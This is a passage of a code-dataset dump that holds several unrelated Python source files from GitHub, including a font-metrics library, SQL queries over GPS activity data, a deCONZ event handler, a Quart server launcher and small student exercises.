vedo.vedo2trimesh(mesh).face_normals\n normals.setflags(write=1)\n barycenters = mesh.cell_centers()\n \n #normalized data\n maxs = points.max(axis=0)\n mins = points.min(axis=0)\n means = points.mean(axis=0)\n stds = points.std(axis=0)\n nmeans = normals.mean(axis=0)\n nstds = normals.std(axis=0)\n\n for i in range(3):\n cells[:, i] = (cells[:, i] - means[i]) / stds[i] #point 1\n cells[:, i+3] = (cells[:, i+3] - means[i]) / stds[i] #point 2\n cells[:, i+6] = (cells[:, i+6] - means[i]) / stds[i] #point 3\n barycenters[:,i] = (barycenters[:,i] - mins[i]) / (maxs[i]-mins[i])\n normals[:,i] = (normals[:,i] - nmeans[i]) / nstds[i]\n\n X = np.column_stack((cells, barycenters, normals))\n X = X.transpose(1, 0)\n\n meta = dict()\n meta[\"cells\"] = torch.from_numpy(X).unsqueeze(0).to(device, dtype=torch.float)\n KG_6 = get_graph_feature(torch.from_numpy(X[9:12, :]).unsqueeze(0), k=6).squeeze(0)\n KG_12 = get_graph_feature(torch.from_numpy(X[9:12, :]).unsqueeze(0), k=12).squeeze(0)\n meta[\"KG_6\"] = 
KG_6.unsqueeze(0).to(device, dtype=torch.float)\n meta[\"KG_12\"] = KG_12.unsqueeze(0).to(device, dtype=torch.float)\n\n return meta","repo_name":"MAS0NM/tooth_seg","sub_path":"postprocessing.py","file_name":"postprocessing.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"17612533878","text":"import json\nimport re\n\nconfig_file = \"C:\\\\Users\\\\mweas\\\\OneDrive\\\\Documents\\\\code_repos\\\\HexMapBuilderVue\\\\src\\\\assets\\\\hexConfig.json\"\n\n\nwith open(config_file) as f:\n config = json.load(f)\n\nglobalFillLists = config['globalFillLists']\ncontentTags = config['contentTags']\n\nfor category in contentTags.keys():\n for (k, v) in contentTags[category].items():\n print(\">>>>>\", k)\n for description in v['description']:\n if len(re.findall(\"#\\w+\", description['text'])) > 0:\n for match in re.findall(\"#\\w+\", description['text']):\n print(match)\n if len(v[re.sub(\"#\", \"\", match)]) == 0:\n print(\"!!!!!!!!!!!!! No entries!\")\n if len(re.findall('!\\w+', description['text'])) > 0:\n for match in re.findall(\"!\\w+\", description['text']):\n print(match)\n if len(globalFillLists[re.sub(\"!\", \"\", match)]) == 0:\n print(\"!!!!!!!!!!!!! No entries!\")\n for hook in v['hook']:\n if len(re.findall('#\\w+', hook['text'])) > 0:\n for match in re.findall(\"#\\w+\", hook['text']):\n print(match)\n if len(v[re.sub(\"#\", \"\", match)]) == 0:\n print(\"!!!!!!!!!!!!! No entries!\")\n if len(re.findall('!\\w+', hook['text'])) > 0:\n for match in re.findall(\"!\\w+\", hook['text']):\n print(match)\n if len(globalFillLists[re.sub(\"!\", \"\", match)]) == 0:\n print(\"!!!!!!!!!!!!! No entries!\")\n","repo_name":"mgordin/HexMapBuilderVue","sub_path":"src/choiceListChecker.py","file_name":"choiceListChecker.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2672187639","text":"\"\"\"Mange events from deCONZ.\"\"\"\n\nfrom collections.abc import Callable\nimport logging\nfrom typing import TYPE_CHECKING, Any\n\nfrom ..models import ResourceGroup\nfrom ..models.event import Event, EventType\n\nif TYPE_CHECKING:\n from ..gateway import DeconzSession\n\n\nLOGGER = logging.getLogger(__name__)\n\nSubscriptionType = tuple[\n Callable[[Event], None],\n tuple[EventType, ...] | None,\n tuple[ResourceGroup, ...] | None,\n]\nUnsubscribeType = Callable[[], None]\n\n\nclass EventHandler:\n \"\"\"Event handler class.\"\"\"\n\n def __init__(self, gateway: \"DeconzSession\") -> None:\n \"\"\"Initialize API items.\"\"\"\n self.gateway = gateway\n self._subscribers: list[SubscriptionType] = []\n\n def subscribe(\n self,\n callback: Callable[[Event], None],\n event_filter: tuple[EventType, ...] | EventType | None = None,\n resource_filter: tuple[ResourceGroup, ...] 
| ResourceGroup | None = None,\n ) -> UnsubscribeType:\n \"\"\"Subscribe to events.\n\n \"callback\" - callback function to call when on event.\n Return function to unsubscribe.\n \"\"\"\n if isinstance(event_filter, EventType):\n event_filter = (event_filter,)\n if isinstance(resource_filter, ResourceGroup):\n resource_filter = (resource_filter,)\n\n subscription = (callback, event_filter, resource_filter)\n self._subscribers.append(subscription)\n\n def unsubscribe() -> None:\n self._subscribers.remove(subscription)\n\n return unsubscribe\n\n def handler(self, raw: dict[str, Any]) -> None:\n \"\"\"Receive event from websocket and pass it along to subscribers.\"\"\"\n event = Event.from_dict(raw)\n\n for callback, event_filter, resource_filter in self._subscribers:\n if event_filter is not None and event.type not in event_filter:\n continue\n\n if resource_filter is not None and event.resource not in resource_filter:\n continue\n\n callback(event)\n","repo_name":"Kane610/deconz","sub_path":"pydeconz/interfaces/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"37"} +{"seq_id":"9994281560","text":"from vharfbuzz import Vharfbuzz\nimport uharfbuzz as hb\nfrom fontTools import ttLib\nfrom fontquant.helpers.fontcontent import get_primary_script, get_glyphs_for_script\n\n\nclass CustomHarfbuzz(Vharfbuzz):\n def setup_points_draw_funcs(self, buffer_list):\n def move_to(x, y, buffer_list):\n buffer_list.append((x, y))\n\n def line_to(x, y, buffer_list):\n buffer_list.append((x, y))\n\n def cubic_to(c1x, c1y, c2x, c2y, x, y, buffer_list):\n buffer_list.append((c1x, c1y))\n buffer_list.append((c2x, c2y))\n buffer_list.append((x, y))\n\n def quadratic_to(c1x, c1y, x, y, buffer_list):\n buffer_list.append((c1x, c1y))\n buffer_list.append((x, y))\n\n def close_path(buffer_list):\n pass\n\n self.drawfuncs = hb.DrawFuncs()\n self.drawfuncs.set_move_to_func(move_to)\n self.drawfuncs.set_line_to_func(line_to)\n self.drawfuncs.set_cubic_to_func(cubic_to)\n self.drawfuncs.set_quadratic_to_func(quadratic_to)\n self.drawfuncs.set_close_path_func(close_path)\n\n def glyph_to_points(self, gid):\n if not hasattr(hb, \"DrawFuncs\"):\n raise ValueError(\"glyph_to_points_path requires uharfbuzz with draw function support\")\n\n buffer_list = []\n self.setup_points_draw_funcs(buffer_list)\n self.hbfont.draw_glyph(gid, self.drawfuncs, buffer_list)\n\n return buffer_list\n\n def buf_to_bbox(self, buf):\n x_cursor = 0\n # if \"hhea\" in self.ttfont:\n # # ascender = self.ttfont[\"hhea\"].ascender + 500\n # # descender = self.ttfont[\"hhea\"].descender - 500\n # # fullheight = ascender - descender\n # elif \"OS/2\":\n # ascender = self.ttfont[\"OS/2\"].sTypoAscender + 500\n # descender = self.ttfont[\"OS/2\"].sTypoDescender - 500\n # # fullheight = ascender - descender\n # else:\n # # fullheight = 1500\n # descender = 500\n y_cursor = 0\n\n x_min = None\n x_max = None\n y_min = None\n y_max = None\n\n for info, pos in zip(buf.glyph_infos, buf.glyph_positions):\n # dx, dy = pos.position[0], pos.position[1]\n glyph_path = [(x + x_cursor, y + y_cursor) for x, y in self.glyph_to_points(info.codepoint)]\n for x, y in glyph_path:\n if x_min is None or x < x_min:\n x_min = x\n if x_max is None or x > x_max:\n x_max = x\n if y_min is None or y < y_min:\n y_min = y\n if y_max is None or y > y_max:\n y_max = y\n x_cursor += pos.position[2]\n y_cursor += pos.position[3]\n\n return x_min, x_max, y_min, y_max\n\n 
def buf_to_width(self, buf):\n        x_cursor = 0\n\n        for _info, pos in zip(buf.glyph_infos, buf.glyph_positions):\n            # dx, dy = pos.position[0], pos.position[1]\n            x_cursor += pos.position[2]\n\n        return x_cursor\n\n    def str(self, string, options=None):\n        \"\"\"Return the shaped string buffer as a string.\"\"\"\n        buf = self.shape(string, options)\n        return self.serialize_buf(buf)\n\n    def bbox(self, string, options=None):\n        \"\"\"Return the shaped string buffer's bbox.\"\"\"\n        buf = self.shape(string, options)\n        return self.buf_to_bbox(buf)\n\n\nclass CustomTTFont(ttLib.TTFont):\n    def has_feature(self, tag):\n        return tag in [FeatureRecord.FeatureTag for FeatureRecord in self[\"GSUB\"].table.FeatureList.FeatureRecord]\n\n    def glyphname_for_char(self, char):\n        \"\"\"Convert a character to a glyph name.\"\"\"\n        cmap = self.getBestCmap()\n        if ord(char) in cmap:\n            return cmap[ord(char)]\n        else:\n            return None\n\n    def get_primary_script(self):\n        \"\"\"Retrieve font's primary script.\"\"\"\n        return get_primary_script(self)\n\n    def get_glyphs_for_primary_script(self):\n        \"\"\"Retrieve list of glyph names of font's primary_script.\"\"\"\n        return get_glyphs_for_script(self, self.get_primary_script())\n\n\nclass BaseDataType(object):\n    def example_value(self, default_example_value):\n        return self.shape_value(default_example_value) or None\n\n    def return_value_description(self):\n        return None\n\n    def shape_value(self, value):\n        return value\n\n\nclass Percentage(BaseDataType):\n    def example_value(self, default_example_value):\n        return self.shape_value(default_example_value) or 0.5\n\n    def return_value_description(self):\n        return \"Percentage expressed as float 0—1 (e.g. `0.5`)\"\n\n    def shape_value(self, value):\n        if value is not None:\n            return round(value * 1000) / 1000\n        else:\n            return 0.0\n\n\nclass Boolean(BaseDataType):\n    def example_value(self, default_example_value):\n        return self.shape_value(default_example_value) or True\n\n    def return_value_description(self):\n        return \"Boolean (`True` or `False`)\"\n\n\nclass String(BaseDataType):\n    def example_value(self, default_example_value):\n        return self.shape_value(default_example_value) or \"abc...\"\n\n    def return_value_description(self):\n        return \"String\"\n\n\nclass Integer(BaseDataType):\n    def example_value(self, default_example_value):\n        return self.shape_value(default_example_value) or 5\n\n    def return_value_description(self):\n        return \"Integer number (e.g. 
`5`)\"\n\n\nclass Metric(object):\n name = None\n keyword = None\n children = []\n interpretation_hint = None\n data_type = None\n example_value = None\n\n def __init__(self, ttFont, vhb, parent=None) -> None:\n self.ttFont = ttFont\n self.vhb = vhb\n self.parent = parent\n\n def shape_value(self, value):\n return self.data_type().shape_value(value)\n\n def find_check(self, path):\n for child in self.children:\n instance = child(self.ttFont, self.vhb, parent=self)\n if instance.path() == path.split(\"/\"):\n return instance\n else:\n found = instance.find_check(path)\n if found:\n return found\n return None\n\n def is_included(self, includes):\n path = \"/\".join(self.path())\n # We are at root\n if path == \"\":\n return True\n if includes:\n for include in includes:\n include_root = include.split(\"/\")[0]\n path_root = path.split(\"/\")[0]\n # We are category root\n if include_root == path_root == path:\n return True\n # We are normal metric\n elif path.startswith(include):\n return True\n return False\n else:\n return True\n\n def is_excluded(self, excludes):\n path = \"/\".join(self.path())\n # We are at root\n if path == \"\":\n return False\n if excludes:\n for exclude in excludes:\n exclude_root = exclude.split(\"/\")[0]\n path_root = path.split(\"/\")[0]\n # We are category root\n if exclude_root == path_root == path:\n return True\n # We are normal metric\n elif path.startswith(exclude):\n return True\n return False\n else:\n return False\n\n def value(self, includes=None, excludes=None):\n dictionary = {}\n for child in self.children:\n instance = child(self.ttFont, self.vhb, parent=self)\n if instance.is_included(includes) and not instance.is_excluded(excludes):\n dictionary[instance.keyword] = instance.value(includes, excludes)\n elif not includes and not excludes:\n dictionary[instance.keyword] = instance.value(includes, excludes)\n\n return dictionary\n\n def path(self):\n if self.parent:\n return self.parent.path() + [self.keyword]\n else:\n return [self.keyword] if self.keyword else []\n\n def base(self):\n if self.parent:\n return self.parent.base()\n else:\n return self\n\n def link_list(self):\n if self.__doc__:\n link = \"/\".join(self.path()).replace(\"/\", \"\").replace(\" \", \"-\")\n return [f' * [{self.name}](#{self.name.lower().replace(\" \", \"-\")}-{link})']\n else:\n check_list = []\n if self.name:\n check_list.append(\"* \" + self.name + \":\")\n for child in self.children:\n instance = child(self.ttFont, self.vhb, parent=self)\n new_list = instance.link_list()\n if new_list:\n check_list += new_list\n return check_list\n\n def index(self):\n if self.__doc__:\n return \"/\".join(self.path()), self.name\n else:\n check_list = []\n for child in self.children:\n instance = child(self.ttFont, self.vhb, parent=self)\n new_list = instance.index()\n if new_list:\n check_list += new_list\n return check_list\n\n def documentation(self):\n join_sequence = '\"][\"'\n\n if self.__doc__:\n markdown = f\"\"\"\\\n### {self.name} (`{\"/\".join(self.path())}`)\n\n{\" \".join([line.strip() for line in self.__doc__.splitlines()])}\n\"\"\"\n if self.interpretation_hint:\n markdown += \"\\n_Interpretation Hint:_ \" + (\n \" \".join([line.strip() for line in self.interpretation_hint.splitlines()]) + \"\\n\\n\"\n )\n\n if self.data_type:\n markdown += f\"\"\"\\n_Return Value:_ {self.data_type().return_value_description()}\n\n_Example:_\n```python\nfrom fontquant import quantify\nresults = quantify(\"path/to/font.ttf\")\nvalue = 
results[\"{join_sequence.join(self.path())}\"][\"value\"]\nprint(value)\n>>> {self.data_type().example_value(self.example_value)}\n```\n\n\"\"\"\n\n return markdown\n\n else:\n markdown = \"\"\n\n if self.name:\n markdown += f\"## {self.name}\\n\\n\"\n\n for child in self.children:\n instance = child(self.ttFont, self.vhb, parent=self)\n markdown += instance.documentation()\n return markdown\n\n\nfrom .casing import Casing # noqa E402 (Circular import)\nfrom .numerals import Numerals # noqa E402 (Circular import)\nfrom .appearance import Appearance # noqa E402 (Circular import)\n\n\nclass Base(Metric):\n children = [Casing, Numerals, Appearance]\n\n\ndef quantify(font_path, includes=None, excludes=None):\n ttFont = CustomTTFont(font_path)\n vhb = CustomHarfbuzz(font_path)\n\n base = Base(ttFont, vhb)\n return base.value(includes, excludes)\n","repo_name":"googlefonts/fontquant","sub_path":"Lib/fontquant/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10827,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"28057346414","text":"from DbConnector import DbConnector\nfrom haversine import haversine\nfrom tabulate import tabulate\nimport datetime\n\nclass Queries:\n def __init__(self):\n self.connection = DbConnector()\n self.db_connection = self.connection.db_connection\n self.cursor = self.connection.cursor\n\n def q1(self):\n tables = [\"Activity\", \"TrackPoint\", \"User\"]\n for table in tables:\n query = \"SELECT COUNT(id) FROM {}\".format(table)\n self.cursor.execute(query)\n rows = self.cursor.fetchall()\n nr = rows[0][0]\n print(\"There are {} entries in the {} table\".format(nr, table))\n\n def q2(self):\n query_activities = \"SELECT COUNT(id) FROM Activity\"\n query_users = \"SELECT COUNT(id) FROM User\"\n\n self.cursor.execute(query_activities)\n count_activities = self.cursor.fetchall()\n\n self.cursor.execute(query_users)\n count_users = self.cursor.fetchall()\n\n avg = count_activities[0][0] / count_users[0][0]\n print(\"The average number of activites per user is: {}\".format(round(avg, 0), float))\n\n def q3(self):\n \"\"\"Find the top 20 users with the highest number of activities\"\"\"\n query = \"SELECT user_id, COUNT(*) AS Activities FROM Activity GROUP BY user_id ORDER BY Activities DESC LIMIT 20\"\n self.cursor.execute(query)\n user_ids = self.cursor.fetchall()\n print(\"The following users have the highest number of activities\")\n print(tabulate(user_ids, headers=self.cursor.column_names))\n\n\n def q4(self):\n query = \"SELECT DISTINCT user_id FROM Activity \" \\\n \"WHERE transportation_mode='taxi'\"\n self.cursor.execute(query)\n rows = self.cursor.fetchall()\n print(\"The following users have taken a taxi:\")\n print(tabulate(rows, headers=self.cursor.column_names))\n\n def q5(self):\n query = \"SELECT COUNT(id), transportation_mode FROM Activity GROUP BY transportation_mode\"\n\n self.cursor.execute(query)\n rows = self.cursor.fetchall()\n\n print(tabulate(rows, headers=self.cursor.column_names))\n\n def q6(self):\n \"\"\"Find the year with the most activities\"\"\"\n years_activities = {}\n years_hours = {}\n\n for year in range(2007, 2011):\n query_a = \"SELECT COUNT(*) FROM Activity WHERE start_date_time LIKE '{}%'\".format(year)\n self.cursor.execute(query_a)\n number_of_activities = self.cursor.fetchall()[0]\n years_activities[number_of_activities] = year\n\n query_b = \"SELECT SUM(TIMESTAMPDIFF(HOUR, end_date_time, start_date_time)) FROM Activity WHERE start_date_time LIKE 
'{}%'\".format(year)\n self.cursor.execute(query_b)\n number_of_activities = self.cursor.fetchall()[0]\n years_hours[number_of_activities] = year\n\n highest_no_of_activities = max(years_activities.keys())\n year = years_activities[highest_no_of_activities]\n print(\"The year with the most activities is \" + str(year))\n\n most_hours = max(years_hours.keys())\n year = years_hours[most_hours]\n print(\"The year with the most hours of activities is \" + str(year))\n\n\n def q7(self):\n query = \"SELECT id FROM Activity \" \\\n \"WHERE user_id='112' AND transportation_mode='walk' AND \" \\\n \"(YEAR(start_date_time)=2008 OR YEAR(end_date_time)=2008)\"\n self.cursor.execute(query)\n activities = [result[0] for result in self.cursor.fetchall()]\n\n total_distance = 0\n for activity in activities:\n query = \"SELECT lat,lon FROM TrackPoint WHERE activity_id={} AND YEAR(date_time)=2008 ORDER BY date_time\".format(activity)\n self.cursor.execute(query)\n coordinates = self.cursor.fetchall()\n for i in range(len(coordinates)-1):\n coord1 = coordinates[i]\n coord2 = coordinates[i+1]\n dist = haversine(coord1, coord2)\n total_distance += dist\n\n print(\"user 112 walked a total of {} km in 2008\".format(round(total_distance,2)))\n\n def q8(self):\n query = \"SELECT Activity.user_id, SUM(TP1.altitude - (\" \\\n \"SELECT altitude FROM TrackPoint TP2 \" \\\n \"WHERE TP2.id = TP1.id - 1 AND TP2.altitude < TP1.altitude AND TP2.activity_id = TP1.activity_id \" \\\n \"ORDER BY id LIMIT 1)) altitude \" \\\n \"FROM TrackPoint TP1 JOIN Activity ON TP1.activity_id = Activity.id WHERE TP1.altitude != -777 AND altitude > 0 GROUP BY Activity.user_id ORDER BY altitude DESC LIMIT 20\"\n\n self.cursor.execute(query)\n altitudes = self.cursor.fetchall()\n\n for i in range(len(altitudes)):\n if altitudes[i][1] is None:\n continue\n altitudes[i] = (altitudes[i][0], float(altitudes[i][1]) * 0.3048)\n\n print(\"Top 20 users with meters gained in total altitude\")\n print(tabulate(altitudes, headers=self.cursor.column_names))\n\n def q9(self):\n \"\"\"Find all users who have invalid activities, and the number of invalid activities per user\"\"\"\n\n time = \"SET @timestamp='0000-00-00 00:00:00'\"\n activity_id = \"SET @activity_id = 0\"\n self.cursor.execute(time)\n self.cursor.execute(activity_id)\n\n query = \"SELECT tabell.user_id AS User, COUNT(DISTINCT tabell.current_id) AS 'Number of invalid Activities' \" \\\n \"FROM (SELECT user_id, @timestamp previous_timestamp, @timestamp:=date_time curr_timestamp, @activity_id previous_id, @activity_id:=Activity.id current_id \" \\\n \"FROM Activity JOIN TrackPoint ON (Activity.id = TrackPoint.activity_id)) AS tabell \" \\\n \"WHERE (TIMESTAMPDIFF(MINUTE, tabell.previous_timestamp, tabell.curr_timestamp) > 5 AND (tabell.current_id = tabell.previous_id))\" \\\n \"GROUP BY User\"\n\n\n self.cursor.execute(query)\n results = self.cursor.fetchall()\n\n print(tabulate(results, headers=self.cursor.column_names))\n\n def q10(self):\n # coordinates of the forbidden city. 
lat = round(39.916, 2)\n        lon = round(116.397, 2)\n\n        query = \"SELECT DISTINCT user_id from Activity \" \\\n                \"JOIN TrackPoint ON Activity.id=TrackPoint.activity_id \" \\\n                \"WHERE ROUND(lat,2)={} AND ROUND(lon,2)={}\".format(lat, lon)\n        self.cursor.execute(query)\n        users = [entry[0] for entry in self.cursor.fetchall()]\n        print(\"The following users have tracked an activity in the Forbidden City:\", users)\n\n    def q11(self):\n        query = \"SELECT user_id, transportation_mode as most_used_transportation_mode, MAX(count1) as count \" \\\n                \"FROM (SELECT user_id, transportation_mode, COUNT(*) AS count1 FROM Activity GROUP BY user_id, transportation_mode) as a1 \" \\\n                \"GROUP BY user_id, transportation_mode \" \\\n                \"ORDER BY user_id, count DESC\" \\\n\n        self.cursor.execute(query)\n        results = self.cursor.fetchall()\n\n        filtered_results = []\n        user_id = 0\n        for i in range(len(results)):\n            # when duplicates, takes the one that is ranked on top by the sql query\n            if user_id == results[i][0]:\n                continue\n\n            else:\n                user_id = results[i][0]\n                filtered_results.append((results[i][0], results[i][1]))\n\n        print(tabulate(filtered_results, headers=self.cursor.column_names))\n\ndef main():\n    program = None\n    try:\n        program = Queries()\n        print(\"QUESTIONS:\")\n        print(\"\\nQuestion 1: \")\n        program.q1()\n        print(\"\\nQuestion 2: \")\n        program.q2()\n        print(\"\\nQuestion 3: \")\n        program.q3()\n        print(\"\\nQuestion 4: \")\n        program.q4()\n        print(\"\\nQuestion 5: \")\n        program.q5()\n        print(\"\\nQuestion 6: \")\n        program.q6()\n        print(\"\\nQuestion 7: \")\n        program.q7()\n        print(\"\\nQuestion 8: \")\n        program.q8()\n        print(\"\\nQuestion 9: \")\n        program.q9()\n        print(\"\\nQuestion 10: \")\n        program.q10()\n        print(\"\\nQuestion 11: \")\n        program.q11()\n    except Exception as e:\n        print(\"ERROR: failed to use database:\", e)\n    finally:\n        if program:\n            program.connection.close_connection()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"jonryf/TDT4225-Exercise2","sub_path":"Queries.py","file_name":"Queries.py","file_ext":"py","file_size_in_byte":8411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"6016379566","text":"# count how many times each letter occurs in a string\n\ndef strcounter(s):\n    symbols_counter = {}\n    for symbol in s:\n        symbols_counter[symbol] = symbols_counter.get(symbol, 0) + 1\n\n    return symbols_counter\n\n\nfor key, value in strcounter('aaaabbbbbuuuudsfsfsdf').items():\n    print(f'{key}: {value}')\n\n\"\"\"HOMEWORK\"\"\"\n\n\ndef palindrome(s):\n    \"\"\"\n    The input string is reversed and compared with the original;\n    if they are equal, True is returned, otherwise False\n    :param s: str\n    :return: True or False\n    \"\"\"\n    return True if s == s[::-1] else False\n\n\nprint(palindrome('лепсспел'))\nprint(palindrome('helloworld'))\n","repo_name":"AndreyBry/MaximumTest","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"29900475308","text":"#\n# A minimalist set of codes to regulate output verbosity for publicsensors sampling codes\n#\n# Use vrb_setlevel to set the global parameter \"verbosity_level\". Thereafter, arguments\n# of vrb_print will be printed to the REPL iff the parameter \"level\"<=verbosity_level.\n#\n
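# Example (added): with the default verbosity_level=5, vrb_print('msg', level='base') prints (2 <= 5) while level='high' (15) is suppressed.\n#\n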
Thereafter, arguments\n# of vrb_print will be printed to the REPL iff the parameter \"level\"<=verbosity_level.\n#\n# verbosity _level is set in default_params and user_params in public_sensors code; change\n# those settings to modulate terminal output.\n#\n# verbosity_dict is a dictionary than enables descriptive in addition to numerical settings.\n\nglobal verbosity_level, verbosity_dict\nverbosity_level=5\nverbosity_dict={'base':2,'low':5,'med':10,'high':15}\n\ndef vrb_setlevel(*args):\n # Called with no arguments, returns verbosity level\n # Called with one argument, sets it as the verbosity level\n global verbosity_level\n if len(args)==0:\n print('Verbosity level: ',verbosity_level)\n else:\n if isinstance(args[0],int) or isinstance(args[0],float):\n verbosity_level=args[0]\n elif isinstance(args[0],str):\n try:\n verbosity_level=verbosity_dict[args[0]]\n except:\n print('Verbosity error: verbosity_level in vrb_print must be a number or in ',list(verbosity_dict.keys()))\n verbosity_level = verbosity_dict['base']\n \n \ndef vrb_print(*args,level='med'):\n global verbosity_level\n if isinstance(level,int) or isinstance(level,float):\n plevel=level\n elif isinstance(level,str):\n try:\n plevel=verbosity_dict[level]\n except:\n print('Verbosity error: level in vrb_print must be a number or in ',list(verbosity_dict.keys()))\n plevel = verbosity_dict['base']\n if plevel<=verbosity_level:\n for a in args:\n print(a)\n \n","repo_name":"publicsensors/MicrocontrollerKits","sub_path":"Sensors/SetUp/verbosity.py","file_name":"verbosity.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73680745706","text":"import os\nimport logging\nfrom quart import Quart\nimport asyncio\nfrom dotenv import load_dotenv\nfrom manager import AudioManager\nimport blueprints\nfrom robocomm import handle_plc_connection\n\n\nload_dotenv()\n# if PLC_HOST is unset, then the server will not attempt to communicate with any robots/plcs\nPLC_HOST = os.getenv(\"PLC_HOST\")\nPLC_PORT = os.getenv(\"PLC_PORT\", \"9999\")\nUPLOAD_FOLDER = os.getenv(\"UPLOAD_FOLDER\", \"servaudiofiles\")\nALLOWED_EXTENSIONS = os.getenv(\"ALLOWED_EXTENSIONS\", \"mp3,3gp,mov,m4a\")\nMODEL = os.getenv(\"MODEL\", \"base.en\")\nWORKERS = os.getenv(\"WORKERS\", \"1\")\nUSE_CPU = os.getenv(\"USE_CPU\", \"True\")\nPORT = os.getenv(\"PORT\", \"5000\")\nDEMO_MODE = os.getenv(\"DEMO_MODE\", \"False\")\n\n\nlog = logging.getLogger(\"server.main\")\n\n\ndef _setup_logging(debug=False):\n \"\"\"sets up the server logger\"\"\"\n level = logging.DEBUG if debug else logging.INFO\n ch = logging.StreamHandler()\n formatter = logging.Formatter(\"[%(asctime)s %(levelname)s %(name)s] %(message)s\")\n ch.setFormatter(formatter)\n log = logging.getLogger(\"server\")\n log.setLevel(level)\n log.addHandler(ch)\n\n\ndef main():\n _setup_logging(debug=True)\n \n app = Quart(__name__)\n app.config[\"UPLOAD_FOLDER\"] = UPLOAD_FOLDER\n app.config[\"ALLOWED_EXTENSIONS\"] = set(ALLOWED_EXTENSIONS.split(\",\"))\n app.config[\"MODEL\"] = MODEL\n app.config[\"WORKERS\"] = int(WORKERS)\n app.config[\"USE_CPU\"] = USE_CPU.lower() in [\"true\", \"yes\"]\n app.config[\"DEMO_MODE\"] = DEMO_MODE.lower() in [\"true\", \"yes\"]\n app.config[\"MANAGER\"] = AudioManager(\n app.config[\"MODEL\"],\n app.config[\"UPLOAD_FOLDER\"],\n app.config[\"WORKERS\"],\n app.config[\"USE_CPU\"],\n )\n app.config[\"DIAGNOSTIC_QUEUE\"] = asyncio.Queue()\n app.config[\"RESPONSE_QUEUE\"] = 
@app.before_serving\n    async def startup():\n        if app.config[\"PLC_HOST\"] is not None:\n            loop = asyncio.get_event_loop()\n            log.debug(f\"creating server for PLC on port {PLC_PORT}\")\n            app.config[\"CONNECTION\"] = await asyncio.start_server(\n                lambda r, w: handle_plc_connection(app.config[\"DIAGNOSTIC_QUEUE\"], app.config[\"RESPONSE_QUEUE\"], r, w),\n                host=\"127.0.0.1\",\n                port=app.config[\"PLC_PORT\"]\n            )\n            # loop.create_task(app.config[\"CONNECTION\"])\n        else:\n            app.config[\"CONNECTION\"] = None\n    \n    app.run()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"aeasy370/Chatting-With-a-Robot","sub_path":"Server/server/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}{"seq_id":"31551064688","text":"\"\"\"\r\n    Helper function for compiling and linking shaders\r\n\"\"\"\r\n\r\nfrom OpenGL.GL.shaders import compileProgram, compileShader\r\nfrom OpenGL.GL import GL_VERTEX_SHADER, GL_FRAGMENT_SHADER\r\n\r\ndef create_shader(filepath) -> int:\r\n    \"\"\"\r\n    reads source code for the given filepath (both .vert and .frag files),\r\n    compiles and links. Allocates memory, the created shader must be destroyed.\r\n\r\n    Parameters:\r\n    \r\n        filepath: the file to read. everything up to the file extension\r\n    \r\n    Returns:\r\n        The index of the created shader.\r\n    \"\"\"\r\n\r\n    with open(f\"{filepath}.vert\", \"r\") as f:\r\n        vertex_src = f.readlines()\r\n    \r\n    with open(f\"{filepath}.frag\", \"r\") as f:\r\n        fragment_src = f.readlines()\r\n    \r\n    return compileProgram(\r\n        compileShader(vertex_src, GL_VERTEX_SHADER),\r\n        compileShader(fragment_src, GL_FRAGMENT_SHADER)\r\n    )","repo_name":"amengede/dogstone","sub_path":"src/shader_functions.py","file_name":"shader_functions.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}{"seq_id":"2595022366","text":"#listThings.py\r\n#Will Schick\r\n#4/17/2018\r\n\r\n\r\n##Returns the product of all the elements in the list or 1 if the list is empty.\r\ndef product(values):\r\n    i = 0\r\n    product = 1\r\n    \r\n    #Loop through the indices and produce a product\r\n    while i < len(values):\r\n        #body\r\n        product = product * values[i]\r\n        \r\n        #Update\r\n        i = i + 1\r\n        \r\n    return product\r\n\r\n\r\n##Returns the number of odd numbers in the list. Does not alter the list.\r\n
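## Example (added): countOdds([1, 2, 3, 4, 5]) returns 3.\r\n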
def countOdds(values):\r\n    #setup\r\n    i = 0\r\n    oddCount = 0\r\n    \r\n    #Loop through the indices and count the amount of odds\r\n    while i < len(values):\r\n        #Body\r\n        if (values[i] % 2) == 1: #If the remainder is 1, AKA if it's odd\r\n            oddCount = oddCount + 1 #Add to the odd count\r\n        \r\n        #Update\r\n        i = i + 1\r\n    \r\n    #return\r\n    return oddCount\r\n\r\n\r\n##Returns a new list containing the squares of each value in the original list.\r\ndef squares(values):\r\n    #setup\r\n    i = 0\r\n    newList = [] #Create a new list\r\n    \r\n    #Loop through the indices and append their squares to the new list\r\n    while i < len(values):\r\n        #Body\r\n        newList.append(values[i]*values[i])\r\n        #Update\r\n        i = i + 1\r\n    \r\n    #return\r\n    return newList\r\n\r\n\r\n##Computes and returns the alternating sum of the integer elements in the list.\r\ndef computeAltSum(values):\r\n    i = 0\r\n    altSum = 0\r\n    subtracting = False\r\n    \r\n    #Loop through the indices, alternating between addition and subtraction to a sum\r\n    while i < len(values):\r\n        #Body\r\n        if subtracting == True:\r\n            altSum = altSum - values[i]\r\n            subtracting = False\r\n        else:\r\n            altSum = altSum + values[i]\r\n            subtracting = True\r\n        \r\n        #update\r\n        i = i + 1\r\n    \r\n    #Return\r\n    return altSum\r\n\r\n\r\n##Alters the list by replacing each negative value in the list 